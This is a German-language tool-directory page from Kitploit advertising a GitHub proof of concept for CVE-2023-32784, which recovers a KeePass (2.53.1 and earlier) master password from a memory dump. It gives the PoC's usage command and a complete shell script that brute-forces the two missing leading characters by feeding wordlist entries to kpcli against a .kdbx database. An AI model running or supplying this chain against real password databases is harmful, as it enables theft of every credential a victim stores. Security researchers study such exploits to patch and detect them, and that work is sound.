Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-32784 — Master-Passwort einer Keepass-Datenbank <= 2.53.1 abrufen | Kitploit
Tools/GitHubGitHub/dawnl3ss/cve-2023-32784
Passwort-CrackingSpeicherforensikSchwachstellenanalyseExploitationForensik
GitHubdawnl3ss/cve-2023-32784

CVE-2023-32784

Master-Passwort einer Keepass-Datenbank <= 2.53.1 abrufen

Repository anzeigen
8vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

keepass-dump-masterkey

Verwendung

python3 poc.py <PathToDmp>

Vorschau

Zur Erinnerung: Das erste Zeichen kann nicht im Dump gefunden werden, und für das zweite gibt dir das Skript nur wenige Möglichkeiten. In jedem Fall empfehlen wir, den Brute-Force-Angriff auf 2 Zeichen mit dem folgenden Skript durchzuführen:

root@kitploit:~
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
    echo "Using password: \"$i\""
    echo "$i" | kpcli --kdb=$1 && exit 0
done < $2

Dieses Skript funktioniert sehr gut auf einem physischen Rechner, bei virtuellen Maschinen scheint es nicht stabil zu sein

Übrigens: Das Python-Skript in diesem Projekt folgt dem Ansatz des folgenden Projekts: https://github.com/vdohney/keepass-password-dumper

Tool herunterladen